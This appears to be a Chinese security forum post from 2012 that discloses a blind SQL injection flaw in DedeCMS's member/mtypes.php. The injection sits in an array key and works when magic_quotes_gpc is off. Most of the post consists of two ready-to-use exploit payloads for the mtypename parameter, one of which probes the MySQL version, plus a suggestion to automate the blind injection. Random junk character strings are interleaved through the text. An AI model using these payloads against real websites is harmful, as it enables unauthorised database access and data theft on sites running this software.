需要magic_quotes_gpc = Off,所以说是鸡肋啊.
, b: \" t) N: _, {1 g; \* |
. ^6 G0 M) `- H @! G. ?4 j 5 g( U$ y; t. H
发生在数组key里的注射漏洞,有点意思.8 ]' K2 ]1 N+ P3 z' J
. S0 X$ }( a, D+ V. @, ?! Q; Y
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
5 R# w; B) }# }! Z . _1 ]6 \! j9 H& E' m, A& }
http://www.xxx.com /dede/member/mtypes.php?dopost=save
8 d& v. t# g e6 h' J/ s- j * y: W8 E$ \& V8 [% i
exploit:
& K0 `9 R3 y# Z, p. lmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r7 d7 b9 `! k( G' d9 U, k
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r8 h1 j8 E1 s9 @6 Z& U0 d7 ]
|
发表于 2012-12-20 08:08:09
收藏
支持
反对